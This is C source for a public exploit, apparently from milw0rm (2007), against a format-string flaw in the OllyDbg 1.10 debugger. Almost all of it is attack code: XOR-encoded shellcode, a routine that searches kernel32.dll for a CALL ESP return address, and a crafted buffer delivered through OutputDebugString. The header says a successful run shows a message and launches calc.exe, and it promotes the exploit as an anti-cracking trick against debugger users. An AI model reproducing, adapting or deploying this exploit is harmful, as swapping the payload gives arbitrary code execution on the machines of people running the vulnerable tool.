/*
..::[ jamikazu presents ]::..
OllyDbg v110 Local Format String Exploit (0day)
Author: jamikazu
Mail: jamikazu@gmail.com
web: http://jamikazu.110mb.com/
Bug discovered by Ned from (http://felinemenace.org/)
Credit: ap0x,milw0rm
Greets: All turkish security researchers ...
invokes calc.exe if successful
You can use it for your AntiCrack tricks against vuln OllyDbg
*/
#define NO_WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#define FORMAT_STRING "%4602u"
#define XOR_DWORD 0x02020202
#ifdef __BORLANDC__
# pragma option -w-asc
# pragma option -w-eff
#else
#pragma comment(linker,"/ENTRY:WinMain")
#pragma comment(lib, "msvcrt.lib")
#endif
// shellcode xored with 0x02 ,Size : 239 by jamikazu
// First gives message than invokes calc.exe
// You can put max 256-sizeof(FORMAT_STRING)-sizeof(DWORD)/*ret*/ bytes of shellcode
// because of bounds check on user-supplied data ,see below
// char buffer[256];
// snprintf(buffer,256,user_buffer);
// buffer[255]= '\0';
char shellcode[] =
"\xEB\x0F\x58\x80\x30\x02\x40\x81\x38\x4F\x4C\x4C\x41\x75\xF4\xEB\x05"
"\xE8\xEC\xFF\xFF\xFF\x57\x89\xEE\x81\xEE\x0E\xEA\x02\x02\x02\x02\x5A"
"\x2F\x91\x15\x42\x02\x8B\x47\xF6\x68\x42\x07\x48\x1A\x42\x02\x52\x89"
"\x47\xF6\x07\xD7\x15\x42\x02\x52\x68\x02\xBA\x01\x01\x01\x01\xFD\xD2"
"\x68\x07\x89\x47\xF6\x07\x50\x1A\x42\x02\x52\xBA\x07\x07\x07\x07\xFD"
"\xD2\x68\x02\xBA\x06\x06\x06\x06\xFD\xD2\x89\xE7\x5F\xC1\x43\x76\x76"
"\x63\x61\x69\x22\x6B\x71\x22\x71\x77\x61\x61\x67\x71\x71\x64\x77\x6E"
"\x23\x08\x08\x55\x67\x22\x63\x70\x67\x22\x6B\x6C\x22\x76\x6A\x67\x22"
"\x72\x70\x6D\x61\x67\x71\x71\x22\x61\x6D\x6C\x76\x67\x7A\x76\x22\x6D"
"\x64\x22\x4D\x6E\x6E\x7B\x46\x60\x65\x2C\x67\x7A\x67\x08\x6C\x6D\x75"
"\x22\x75\x67\x22\x75\x6B\x6E\x6E\x22\x6E\x63\x77\x6C\x61\x6A\x22\x61"
"\x63\x6E\x61\x2C\x67\x7A\x67\x22\x2A\x75\x6B\x6C\x66\x6D\x75\x71\x22"
"\x61\x63\x6E\x61\x77\x6E\x63\x76\x6D\x70\x2B\x02\x4D\x6E\x6E\x7B\x46"
"\x60\x65\x02\x61\x63\x6E\x61\x02\x61\x63\x6E\x61\x02\x4F\x4C\x4C\x41";
DWORD SearchStream(
const char *pvStream,
size_t uStreamSize,
const char *pvSubStream,
size_t uSubStreamSize
)
{
unsigned int uCount = 0,i,j;
while( (uStreamSize) > (uCount) ) {
for(i=0;i<=(uSubStreamSize-1);i++) {
if(*pvStream != pvSubStream[i]) {
*pvStream++;
if( i>0 ) {
for(j=0;j<i;j++)
*pvStream--;
}
break;
}
if( i == (uSubStreamSize-1) )
return (uCount);
*pvStream++;
}
uCount++;
}
return -1;
}
DWORD FindRetToEspAddress(VOID)
{
HMODULE hModule = GetModuleHandle("kernel32.dll");
DWORD dwEspRet;
char* pszCallEsp = "\xFF\xD4"; // CALL ESP
//char* pszJmpEsp = "\xFF\xE4"; // JMP ESP
PIMAGE_DOS_HEADER pimage_dos_header;
PIMAGE_NT_HEADERS pimage_nt_headers;
pimage_dos_header = (PIMAGE_DOS_HEADER)hModule;
pimage_nt_headers = (PIMAGE_NT_HEADERS)((DWORD)hModule+pimage_dos_header->e_lfanew);
dwEspRet = SearchStream((char*)hModule,pimage_nt_headers->OptionalHeader.SizeOfImage,pszCallEsp,sizeof(WORD));
return (dwEspRet += (DWORD)hModule);
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
char* pszEvilBuffer;
ULONG ulEvilBufSize;
DWORD dw_MessageBoxA = (DWORD)GetProcAddress(LoadLibrary("user32.dll"),"MessageBoxA")^XOR_DWORD;
DWORD dw_WinExec = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"WinExec")^XOR_DWORD;
DWORD dw_ExitProcess = (DWORD)GetProcAddress(GetModuleHandle("kernel32.dll"),"ExitProcess")^XOR_DWORD;
DWORD dwRetAddr = FindRetToEspAddress();
int i = 0;
memcpy(shellcode+0x3E,&dw_MessageBoxA,sizeof(DWORD));
memcpy(shellcode+0x50,&dw_WinExec,sizeof(DWORD));
memcpy(shellcode+0x59,&dw_ExitProcess,sizeof(DWORD));
ulEvilBufSize = sizeof(FORMAT_STRING) + sizeof(dwRetAddr) + sizeof(shellcode);
pszEvilBuffer = (char*)malloc(ulEvilBufSize);
memset(pszEvilBuffer,0x90,ulEvilBufSize);
memcpy(pszEvilBuffer+i, FORMAT_STRING, sizeof(FORMAT_STRING)-1); i += sizeof(FORMAT_STRING)-1;
memcpy(pszEvilBuffer+i, &dwRetAddr, sizeof(dwRetAddr)); i += sizeof(dwRetAddr);
memcpy(pszEvilBuffer+i, shellcode, sizeof(shellcode)-1); i += sizeof(shellcode)-1;
// Final =)
OutputDebugString(pszEvilBuffer);
free(pszEvilBuffer);
return 0;
}
# milw0rm.com [2007-04-17]
